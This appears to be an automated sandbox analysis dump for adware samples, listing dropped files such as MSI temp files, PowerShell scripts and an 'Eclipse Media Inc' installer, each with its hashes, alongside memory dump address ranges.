C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1760-28-0x0000000000ED0000-0x00000000015C0000-memory.dmp

C:\Users\Admin\Desktop\adwares\70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f.msi

MD5 e7114dd362a4799d13a3628d30b75c8d
SHA1 51b82c1d8e54bc357b4bc116d42430bda79cfbd9
SHA256 70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f
SHA512 9047a712939901b10cbdc86ef070d695ba373a5076d97545870c024580e3e53c6e0590e2eba162471b84bd8640b8ec1d853703ad8dfae783e2e360189fc981ba

C:\Users\Admin\AppData\Local\Temp\MSI8CBA.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSI8CBA.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSI8DD5.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Users\Admin\AppData\Local\Temp\MSI8DD5.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/4372-50-0x0000000002E70000-0x0000000002EA6000-memory.dmp

memory/4372-49-0x00000000727F0000-0x0000000072FA0000-memory.dmp

memory/4372-51-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/4372-52-0x0000000005630000-0x0000000005C58000-memory.dmp

memory/4372-53-0x0000000005460000-0x0000000005482000-memory.dmp

memory/4372-54-0x0000000005500000-0x0000000005566000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xlw1ka5.erv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-55-0x0000000005DE0000-0x0000000005E46000-memory.dmp

memory/4372-65-0x0000000005F80000-0x00000000062D4000-memory.dmp

memory/4372-66-0x0000000006440000-0x000000000645E000-memory.dmp

memory/4372-67-0x0000000006490000-0x00000000064DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss8E04.tmp.ps1

MD5 f0495913b0efb5b48a43e6ddadf0d0b1
SHA1 f8b679f97d0945c334e16f075c58a2a6f9e7dc02
SHA256 519835313caf6d878c497a4f2fa6ec53f527ff49c6c9edc5ba610c2a5e2dda04
SHA512 a7f9ad541a00a2a465708d953eb62ca53d8f92540e6b5a8f7d91df04f32b36ed1172bc6d25e3d4a2a08275a179b309c5cad1d66b21c8e24fc1ce1aa4360a2f1a

C:\Users\Admin\AppData\Local\Temp\pss8DE4.tmp.ps1

MD5 0d43a81581fc985a6060d85d25a8b265
SHA1 550d11b9719faa5862c7f98a566e7d755e9e6ac2
SHA256 4527b0fd0b50d652d42a88fffcfaa902ef2b01b51c0d6b4f036ea00e955790d1
SHA512 504152d5b581d42bb9141a8febf79ce6ce5e9e80222ba042f3627a289e21845646ba06b89759d21cb7f790c724257fad6ca3382b8424ea332a1d81ac23e1d816

memory/4372-70-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/4372-71-0x00000000069F0000-0x0000000006A86000-memory.dmp

memory/4372-72-0x0000000006970000-0x000000000698A000-memory.dmp

memory/4372-73-0x00000000069C0000-0x00000000069E2000-memory.dmp

memory/4372-74-0x0000000007AD0000-0x0000000008074000-memory.dmp

memory/4372-75-0x0000000008700000-0x0000000008D7A000-memory.dmp

memory/4372-79-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi8DE3.tmp.txt

MD5 b026e6ffa279860878010f72b6e7c2be
SHA1 c1625517b7ad6867dbf4d190bfa4381d94a0f658
SHA256 5586c7abaee86e3fd8950e22c4de531b8096ade1b3710e249a04d8a4c1c507e1
SHA512 a557c2f2450f9c3c09d0eebf7ac4818c30491f00bcdc7e4766a0670fdc6d5e58625fb92b6931a882cc1792623afc3c6dfbd3f0d2c8c7152d2046f2b590ac2210

C:\Users\Admin\AppData\Local\Temp\MSIA7F5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA7F5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA816.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA816.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA815.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA815.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA815.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIAA0B.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Users\Admin\AppData\Local\Temp\MSIAA0B.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Users\Admin\AppData\Local\Temp\MSIAA2C.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIAA2C.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIAA5B.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIAA5B.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 0774a05ce5ee4c1af7097353c9296c62
SHA1 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256 d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

C:\Users\Admin\AppData\Local\Temp\MSIABA5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

memory/2332-115-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIABA5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

memory/2332-116-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/2332-117-0x00000000028E0000-0x00000000028F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c74a5ea6a7a45ca3654446d0c1e10afd
SHA1 3af20b62b276cc372e88ecf413adf1c70965ea95
SHA256 94e4ceeac2e2f5f2dea41b7f4fd09617764abaafe5c5fa76df363527686a856f
SHA512 6adacb022b60844993b26ff5534d82ba3c121162827f803e884205b4dc831efc55d4fcdf69fca019746ad9c1cdeb6ae73d10db7ec96fddc9985bd105bb4edefa

C:\Users\Admin\AppData\Local\Temp\pssAA2C.tmp.ps1

MD5 699bd0fd38d45159138a22b1eedb16b8
SHA1 8a2d05e386ca27c6b5110ef914af72157c21a183
SHA256 0c2905c61728369c687a3c9763db9ffb771a32fa30c7980bb45707b73b5b5363
SHA512 88db375f245187b62077ac55c0d237f56e3762e1cf31ed07b24949126e9ee846d5c81e0dbaca7bfb5ba898c2f4704d7bdf71f7d0c58d25f1ee207285b2555d46

C:\Users\Admin\AppData\Local\Temp\pssAA2B.tmp.ps1

MD5 1965ee29cc565ce1582fe3bc77941934
SHA1 a8ae9c5de6fea8756eedbc40016eea80b2505ac3
SHA256 b62b83e8b0da2db2777b05cddd5370eb43f8a3fb30971674f0c367d1c3c2da14
SHA512 d007755c00b231baea688d767a452992628cb9837c6233233fcda20b70f7bbbcdcc8ec3215fca420ba4294f7117694d153a1d248357693d14e75d5d252796ad3

memory/2332-130-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/1092-131-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-132-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-133-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-137-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-139-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-138-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-140-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-142-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-141-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-143-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/2332-144-0x0000000007D40000-0x0000000007F02000-memory.dmp

memory/2332-145-0x0000000008F70000-0x000000000949C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIB5D7.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB607.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

memory/2332-154-0x0000000007520000-0x00000000075B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIB607.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB607.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB5D7.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB6A4.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB6A4.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

memory/2332-163-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\WCSetup_AppWC.msi

MD5 6c3dc29e2e491beed780cf04fd770560
SHA1 5babfacb2fd257326c6ebd2ff02019f9dbb480d8
SHA256 e426d8096da87dc44e070d7934b8eb7cd996a8a19491f57234c8a77fa26f5471
SHA512 d41c74f05e4a4fd45f6f2a386614125b2cd0abd302ffe75a4fa9c6e1adff1ae772fd45b880a7378f9021d1e14989884594c61ff363ea3391b56bbb33a97cc868

C:\Windows\Installer\MSIBEB7.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSIBEB7.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSIBF64.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Windows\Installer\MSIBF64.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Windows\Installer\MSIBF64.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/3752-180-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/3752-181-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-182-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-183-0x0000000005990000-0x0000000005CE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 89b55eeb1f563caf26edeeaa025e17ea
SHA1 1a930373ff7325c30c39fb46f89ae95f59bda3cb
SHA256 1b41d278fb3b75f58dfa2c9128c73bf3c2a0311e1e7c352ab2cb05275d390b1e
SHA512 ee49021a68dea14d4aca1947c69109801064ab0dc03dc9892292adc04fd1eceee65af2fb967f00def84172d8975a715adf40155d0cc4c1ae5c708db2c3d0052e

memory/3752-194-0x00000000060B0000-0x00000000060FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssBF84.tmp.ps1

MD5 23ceeb26566f0064486983d84dbc1732
SHA1 ee7f40645a5e240499ad459b3850e79f61e8a3aa
SHA256 3f02fbe234dff8bfee4f871f2c9cd306d7a505163bd26775443a16b20235fca2
SHA512 04347dc8aec08002c959de0b1a8d3a77ff092161c013b7835eb2898490c54944212564ebf51fd69a34bd4ac468a06402df6bcb688b1665f873073a776c5608a8

C:\Users\Admin\AppData\Local\Temp\pssBF74.tmp.ps1

MD5 f64892b5a7640e2ea30f3b99bb2543cb
SHA1 7b805176d1b66d633132150478cc800e3cdb2e21
SHA256 cfb6033af495ba339d587a8a1799c16804ee3c8da53d1f0148509931f2586299
SHA512 ee31a8dc593b3d642e0f5a97ca3bdb485472e51741822aa031b7e32894c50e2566ccb32bcbf6a17438284d9235ab3d9aec2cfe8fc6898eadef47768b4e187db9

memory/1760-197-0x0000000000ED0000-0x00000000015C0000-memory.dmp

memory/3752-198-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-200-0x0000000072280000-0x0000000072A30000-memory.dmp

C:\Windows\Installer\MSICDBD.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSICDBD.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSICE99.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSICE99.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSID020.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Windows\Installer\MSID020.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/3936-218-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/3936-219-0x00000000054A0000-0x00000000054B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 02ab31332cc4e380642ac6673e5b94e4
SHA1 7cc51b186bb7542a3be22d6bcae35eb61bb9793b
SHA256 c3938e55cae1a043c60fdf2b3e760c7baea79b51a853c0da8cb73e4e058b44dd
SHA512 320a0dbd953d088af4b28d90d36ef822e438e9e9b98536437c5f64455e6a1e255322d5ac44865ea25cc6e8f0fa8f56aa42fa1459664f46d9946a5520385aaa0e

C:\Users\Admin\AppData\Local\Temp\pssD09F.tmp.ps1

MD5 b6bdc6988e7e0b5ef549b06e3bb4a90e
SHA1 8063b49b8f39603fde93b4dfc7fdb91ca051d29e
SHA256 d789772194ae2f4f4adee84a2801030febd42304def4853789b60083b3489c6e
SHA512 727a938c10b9b490317f7010f6abeed27c2a1de08e3be7f58337df63d9efd6d196cd09275546e0ecfe89bc111730bb759e4624faeefcdfc2b72dc465ebf97792

C:\Users\Admin\AppData\Local\Temp\pssD09E.tmp.ps1

MD5 92e8f020390914efb6138613cc07f449
SHA1 8b4fa4c6d0b8832eb4380b3f9a861c0788ec18e5
SHA256 26cf0f5c2dfa1e3589e689f4a16041be87fcaf2b31b7be0ded273c483d9577c2
SHA512 980d19faf254a634b0b362c0d19ecb041caf32ccdfdb3ab45acc5f7a6e307a209def8ce5aea5523ec3517fc1c2eb49e10dc41759cb83becff61f13347309f677

memory/3936-232-0x00000000054A0000-0x00000000054B0000-memory.dmp

memory/3936-234-0x0000000072280000-0x0000000072A30000-memory.dmp

C:\Windows\Installer\MSID8DC.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSID8DC.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\e58bd35.msi

MD5 6c3dc29e2e491beed780cf04fd770560
SHA1 5babfacb2fd257326c6ebd2ff02019f9dbb480d8
SHA256 e426d8096da87dc44e070d7934b8eb7cd996a8a19491f57234c8a77fa26f5471
SHA512 d41c74f05e4a4fd45f6f2a386614125b2cd0abd302ffe75a4fa9c6e1adff1ae772fd45b880a7378f9021d1e14989884594c61ff363ea3391b56bbb33a97cc868

C:\Users\Admin\AppData\Roaming\BBWC\updater.ini

MD5 983440dc39200e47b259fee7becd7c18
SHA1 d0df8deda7ffc1a5ab2a7f12f1256375b2c8d3d5
SHA256 ad349c7068dfd86e041bc7e0263ac9ab8a591f44c8808431f754f8843fbca672
SHA512 9c3492dc776f39fc5197e8c5ddcafbad1ea256071a5d1071fb24854c08c1083b6101381ffb281a8c0108c98e246d93f1bd3b647b5c8e7a7a646bb85ebb771e27

C:\Config.Msi\e58bd34.rbs

MD5 47a8af4cbacf342ee28fe7d3288493b2
SHA1 d2b7719814e59f3d81ef76ac2f409687d280a94e
SHA256 0f78790dbd1dfde4026c2ff073b92090e722dc27e77e36f639fc1072beb47ed4
